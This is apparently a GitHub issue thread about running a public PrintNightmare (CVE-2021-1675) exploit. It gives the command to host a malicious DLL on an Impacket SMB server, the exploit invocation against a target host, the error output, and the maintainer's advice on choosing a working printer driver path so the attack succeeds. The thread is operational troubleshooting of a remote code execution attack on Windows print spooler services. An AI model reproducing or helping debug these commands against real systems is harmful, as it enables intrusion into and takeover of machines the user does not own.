impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION
sunny0day opened this issue · 4 comments
sunny0day commented
Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb
Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'
Exploit log:
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
SMB log:
[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)
Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)
Is anyone familiar with this error?
cube0x0 commented
Paste the full input and output, please.
cube0x0 commented
C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL cannot be used. Remove it from the args and let the script find the correct path, or enumerate it as below:
Get-PrinterDriver |select Path
Path
----
C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll
sunny0day commented
@cube0x0 for your information, this is the result without specifying a path:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\whatanightmare.dll'
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[-] pDriverPath C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL, expected :\Windows\System32\DriverStore\FileRepository\.....
[-] Specify pDriverPath manually